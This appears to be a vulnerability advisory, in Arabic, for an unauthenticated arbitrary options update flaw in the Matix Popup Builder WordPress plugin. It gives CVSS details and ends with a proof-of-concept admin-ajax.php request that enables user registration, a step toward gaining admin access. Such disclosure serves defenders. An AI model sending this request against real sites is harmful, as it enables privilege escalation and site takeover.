
Matix Popup Builder <= 1.0.0 - تحديث خيارات تعسفي غير مصادق عليه
Matix Popup Builder <= 1.0.0 - تحديث خيارات عشوائي غير مصدق
إضافة Matix Popup Builder لووردبريس معرضة لتعديل غير مصرح به للبيانات يمكن أن يؤدي إلى تصعيد الصلاحيات بسبب عدم وجود فحص صلاحية في دالة في جميع الإصدارات حتى الإصدار 1.0.0. وهذا يسمح للمهاجمين غير المصادقين بتحديث خيارات عشوائية في موقع ووردبريس. يمكن استغلال ذلك لتحديث الدور الافتراضي للتسجيل إلى مدير وتمكين تسجيل المستخدمين للمهاجمين للحصول على وصول إداري إلى موقع ضعيف.
Score: 9.8
Vendors: Medma Technologies
Products: Matix Popup Builder
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Interaction: none
Privileges: none
Attack Vector: network
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=4
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
action=medma_mtx_insertContentValue&option_name=users_can_register&content=1